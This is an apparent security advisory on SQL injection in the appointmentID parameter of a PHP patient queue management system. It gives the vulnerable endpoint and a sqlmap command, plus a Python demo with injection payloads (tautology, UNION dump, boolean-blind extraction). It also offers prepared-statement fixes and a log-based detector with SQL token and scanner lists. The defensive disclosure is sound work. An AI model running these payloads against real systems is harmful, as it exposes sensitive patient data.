Author: Ravi Pipalwa
Date: January 28, 2026
System: PQMS — Patient Queue Management System
Environment: Localhost (PHP 8.2.12, Apache 2.4.58, MySQL/MariaDB)
Affected Module: Appointment Scheduling / Patient Check-In API
Severity: Critical
Vulnerability Type: SQL Injection (Boolean-based, Error-based, Time-based, UNION-based)
Vendor Homepage: https://www.sourcecodester.com
Software Link: https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html

1. Executive Summary

During a routine security assessment of the PQMS application, a critical SQL Injection vulnerability was identified in the appointment scheduling API. The application processes user input directly in database queries without proper validation or parameterization.

This issue allows an attacker to manipulate backend SQL queries, access sensitive patient and appointment data, and potentially gain full control over the database. In a healthcare-oriented system, this risk is particularly serious due to the highly sensitive nature of patient information and compliance requirements.

The vulnerability was verified using SQLMap, which successfully detected and exploited multiple SQL injection techniques on a single parameter, clearly confirming the severity of the issue.

2. Vulnerability Overview

The vulnerability exists in the following endpoint:

/pqms/php/api_patient_schedule.php?appointmentID=APT202601299

The parameter: appointmentID (GET) is directly embedded into SQL queries without sanitization or the use of prepared statements. Because of this, attackers can inject malicious SQL payloads and alter the intended logic of the database query.

SQLMap confirmed that the parameter supports:

  • Boolean-based blind SQL injection
  • Error-based SQL injection
  • Time-based blind SQL injection
  • UNION query SQL injection

This means the WHERE clause of the backend query is under attacker control: every row the application's database user is allowed to SELECT can be read, directly via UNION or, failing that, one bit at a time via the boolean- and time-based blind channels. Whether data can also be modified or destroyed depends on that user's privileges and on whether the database driver executes stacked queries; none of the four confirmed techniques requires either, so read access is the proven impact and write access the plausible one.

3. Affected Endpoint

GET /pqms/php/api_patient_schedule.php?appointmentID=APT202601299

The appointmentID parameter is vulnerable to SQL Injection because its value is placed directly into the database query without validation or parameterization.

4. Proof of Concept (PoC)

The testing process followed a controlled and reproducible methodology:

a.) The HTTP request for the endpoint above was captured with an intercepting proxy and saved to pqms-req.txt (the file passed to sqlmap -r).

b.) SQLMap was executed using:

sqlmap -r pqms-req.txt --batch --level=5 --risk=3 --dbs --threads=10

Note that --risk=3 enables OR-based boolean payloads, which can change rows if the injected parameter ever reaches an UPDATE or DELETE statement; run it only against a disposable test instance, as was done here on localhost.

c.) SQLMap successfully:

  • Identified the backend DBMS as MySQL/MariaDB
  • Detected the injection point at appointmentID
  • Extracted database names
  • Confirmed multiple exploitation techniques

d.) Enumerated databases:

[*] cdms
[*] db_pqms
[*] information_schema
[*] mysql
[*] performance_schema

This confirms unauthorized access to the database structure.

5. Impact Assessment

If this vulnerability were exploited in a real-world deployment, an attacker could:

  • Access all patient and appointment records
  • Steal or modify sensitive healthcare data
  • Extract user credentials and system configuration
  • Bypass application logic
  • Delete or corrupt the database
  • Potentially escalate to server-level compromise

In healthcare systems, this could result in:

  • Severe data privacy violations
  • Regulatory non-compliance
  • Legal consequences
  • Loss of trust from patients and stakeholders
  • Operational downtime

6. Root Cause Analysis

The issue stems from several core security gaps:

  • SQL queries are constructed using raw user input
  • No use of prepared statements or parameterized queries
  • Missing input validation and format enforcement
  • Overly permissive database privileges
  • Lack of monitoring for malicious database activity

7. Security Recommendations

Immediate Remediation:

a.) Use Prepared Statements

The appointment ID must reach the database only as a bound parameter, never concatenated into the SQL string. With PDO, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared on the server rather than interpolated client-side.

  • Using PDO:
$id = $_GET['appointmentID'] ?? '';   // avoid an undefined-index warning
$stmt = $pdo->prepare("SELECT * FROM appointments WHERE appointmentID = :id");
$stmt->execute(['id' => $id]);        // value is bound, never parsed as SQL
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
  • Using MySQLi:
$id = $_GET['appointmentID'] ?? '';
$stmt = $conn->prepare("SELECT * FROM appointments WHERE appointmentID = ?");
$stmt->bind_param("s", $id);          // bind_param takes a variable by reference
$stmt->execute();
$rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);   // get_result() needs mysqlnd (default in PHP 8)

b.) Validate Appointment ID Format

  • Appointment IDs follow a fixed structure (APT followed by nine digits, e.g. APT202601299), so reject anything else before it reaches the query:
$id = $_GET['appointmentID'] ?? '';
if (!preg_match('/^APT[0-9]{9}\z/', $id)) {   // \z: no trailing newline accepted
    http_response_code(400);                   // client error, not a database error
    exit('Invalid appointment ID format.');
}

This check is defence in depth. The prepared statement is what removes the injection; validation alone must not be relied on.

c.) Apply Least-Privilege Database Access

The application database user should be limited to the db_pqms database and should not hold:

  • DROP
  • ALTER
  • FILE
  • SUPER
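The script below is an added example, not code from this advisory or from PQMS. It replays the injection techniques listed in sections 2 to 4 (tautology, UNION-based dump, boolean-based blind extraction) against a lookup built the way the advisory describes, then shows the parameterized and allow-listed lookups from 7a and 7b stopping them. An in-memory SQLite database stands in for MySQL/MariaDB; the table layout, the users table, every row and the admin hash are constructed for the demo. Time-based probes are omitted because SQLite has no SLEEP(), and the one MySQL difference that matters for blind extraction is noted in a comment.

```python
"""Vulnerable vs. hardened appointmentID lookup, with the injection techniques
from the advisory replayed against the vulnerable form.

Added example, not PQMS code.  An in-memory SQLite database stands in for the
MySQL/MariaDB backend; the table layout, the users table, all rows and the
admin hash are constructed for this demo.
"""
import re
import sqlite3
import string

# Allow-list for the ID format shown in the advisory (APT + nine digits).
APPOINTMENT_ID_RE = re.compile(r"^APT[0-9]{9}$")

# Constructed, non-real secret for the attacker to go after.
ADMIN_HASH = "$2y$10$constructedhash"


def make_db():
    """Constructed schema and rows; names are assumptions, not PQMS's."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE appointments (appointmentID TEXT PRIMARY KEY, patient TEXT, slot TEXT);
        CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT);
        INSERT INTO appointments VALUES
            ('APT202601299', 'Alice Example', '2026-01-29 09:00'),
            ('APT202601300', 'Bob Example',   '2026-01-29 09:30');
    """)
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (ADMIN_HASH,))
    return conn


def lookup_vulnerable(conn, appointment_id):
    """The pattern the advisory describes: raw input concatenated into the SQL."""
    sql = ("SELECT appointmentID, patient, slot FROM appointments "
           f"WHERE appointmentID = '{appointment_id}'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, appointment_id):
    """Bound parameter (the PDO/MySQLi '?' equivalent): input cannot alter the query."""
    return conn.execute(
        "SELECT appointmentID, patient, slot FROM appointments WHERE appointmentID = ?",
        (appointment_id,),
    ).fetchall()


def lookup_hardened(conn, appointment_id):
    """Allow-list check in front of the bound query: defence in depth, not the fix."""
    if not APPOINTMENT_ID_RE.fullmatch(appointment_id):
        raise ValueError("invalid appointment ID format")
    return lookup_parameterized(conn, appointment_id)


# --- attacker side: the techniques SQLMap reported, driven by hand ----------
TAUTOLOGY = "' OR '1'='1"                                                   # logic bypass
UNION_DUMP = "x' UNION SELECT username, password_hash, 'x' FROM users -- "  # UNION-based
ADMIN_HASH_SUBQUERY = "(SELECT password_hash FROM users WHERE username='admin')"


def boolean_blind_extract(conn, lookup, secret_sql=ADMIN_HASH_SUBQUERY, max_len=64):
    """Recover a secret character by character from a yes/no oracle.

    The oracle is whether the lookup returns a row; the injected AND clause is
    true only when the guessed length or character is right.  SQLite compares
    text byte-exactly; against MySQL's case-insensitive collations an attacker
    would wrap the comparison in BINARY.
    """
    length = next((n for n in range(1, max_len + 1)
                   if lookup(conn, f"APT202601299' AND length({secret_sql})={n} AND '1'='1")),
                  None)
    if length is None:
        return None
    charset = string.digits + string.ascii_letters + string.punctuation
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            esc = ch.replace("'", "''")  # keep the payload's own quoting well-formed
            probe = f"APT202601299' AND substr({secret_sql},{pos},1)='{esc}' AND '1'='1"
            if lookup(conn, probe):
                recovered += ch
                break
        else:
            return None  # character outside the charset; real tools widen the set
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("tautology rows :", len(lookup_vulnerable(db, TAUTOLOGY)))
    print("union dump     :", lookup_vulnerable(db, UNION_DUMP))
    print("blind extract  :", boolean_blind_extract(db, lookup_vulnerable))
    print("parameterized  :", lookup_parameterized(db, TAUTOLOGY))
```

Against lookup_vulnerable the tautology returns every appointment, the UNION payload returns the users row in place of an appointment, and the blind loop recovers the whole admin hash from nothing but "row or no row" answers; against lookup_parameterized the same strings are just values that match nothing, and lookup_hardened rejects them before any query runs. Note that SQLMap's --risk=3 OR-based payloads are the TAUTOLOGY shape above, which is why they are dangerous wherever the parameter feeds an UPDATE or DELETE.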

Long-Term Hardening:

  • Implement centralized input validation
  • Use ORM frameworks that enforce parameter binding
  • Deploy a Web Application Firewall (WAF)
  • Enable database activity monitoring
  • Perform regular penetration tests and code audits
  • Add proper logging and alerting for abnormal queries
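As an added example of the logging-and-alerting item (not part of this advisory or of PQMS), the script below parses Apache combined-format access log lines, fully decodes the appointmentID parameter, and flags requests to the affected endpoint that fail the APT + nine digits allow-list, carry SQL tokens, or arrive with a known scanner User-Agent. The log lines are constructed; the path and parameter name are the advisory's, while the token list and scanner list are assumptions to tune for the deployment.

```python
"""Flag SQL-injection attempts against api_patient_schedule.php in Apache
access logs.  Added example, not part of the advisory or of PQMS; the log
lines are constructed and the signature lists are assumptions, not a WAF.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

APPOINTMENT_ID_RE = re.compile(r"^APT[0-9]{9}$")
TARGET_PATH = "/pqms/php/api_patient_schedule.php"

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Tokens that have no business inside an appointment ID (assumed starting set).
SQL_TOKENS = ("union", "select", "sleep(", "benchmark(", "information_schema",
              "extractvalue(", "updatexml(", "--", "/*", "'", '"')
SCANNER_UA = ("sqlmap", "havij", "nikto")  # assumed list of scanner fingerprints

# Constructed sample: two legitimate lookups, three injection attempts (the last
# one double-encoded, a common filter bypass).
SAMPLE_LOG = """\
127.0.0.1 - - [28/Jan/2026:10:15:01 +0000] "GET /pqms/php/api_patient_schedule.php?appointmentID=APT202601299 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [28/Jan/2026:10:15:02 +0000] "GET /pqms/php/api_patient_schedule.php?appointmentID=APT202601299%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
127.0.0.1 - - [28/Jan/2026:10:15:03 +0000] "GET /pqms/php/api_patient_schedule.php?appointmentID=x%27%20UNION%20SELECT%20NULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
127.0.0.1 - - [28/Jan/2026:10:15:04 +0000] "GET /pqms/php/api_patient_schedule.php?appointmentID=APT202601300 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
127.0.0.1 - - [28/Jan/2026:10:15:05 +0000] "GET /pqms/php/api_patient_schedule.php?appointmentID=APT202601299%2527%2520AND%2520%25271%2527%253D%25271 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def _fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads are inspected decoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target, ua):
    """Return the reasons a request to the affected endpoint looks like SQLi ([] if clean)."""
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
    reasons = []
    for raw in params.get("appointmentID", []):
        value = _fully_decode(raw)
        if not APPOINTMENT_ID_RE.fullmatch(value):
            reasons.append("appointmentID fails allow-list")
        low = value.lower()
        reasons.extend(f"sql token {tok!r}" for tok in SQL_TOKENS if tok in low)
    if any(s in ua.lower() for s in SCANNER_UA):
        reasons.append("scanner user-agent")
    return reasons


def scan_log(text):
    """Return (timestamp, client, reasons) for every suspicious line in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or different log format; ignore here
        reasons = classify_request(m["target"], m["ua"])
        if reasons:
            hits.append((m["ts"], m["client"], reasons))
    return hits


if __name__ == "__main__":
    for ts, client, reasons in scan_log(SAMPLE_LOG):
        print(ts, client, "; ".join(reasons))
```

The allow-list check is the signal that survives obfuscation (comments, case changes, alternative keywords all still fail APT + nine digits), so it should drive the alert; the token and User-Agent matches are there to enrich it. Detection of this kind is a compensating control while the parameterization fix is rolled out, not a replacement for it.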

8. OWASP Mapping

OWASP Top 10 (2021 edition, whose category numbering is used below):

  • A03: Injection
  • A05: Security Misconfiguration
  • A09: Security Logging and Monitoring Failures

SQL Injection remains one of the most dangerous and frequently exploited vulnerabilities.

9. Conclusion

The PQMS application is critically vulnerable to SQL Injection through the appointmentID parameter. The vulnerability allows attackers to fully control backend database queries and gain unauthorized access to sensitive healthcare information.

Given the potential impact, this issue should be addressed immediately before any production deployment. Fixing it will significantly improve the security posture and reliability of the system.

10. Disclosure Statement

This report is intended strictly for:

  • Authorized security testing
  • Educational and research purposes
  • Defensive security improvements

No real patient data was accessed, modified, or exposed during this assessment.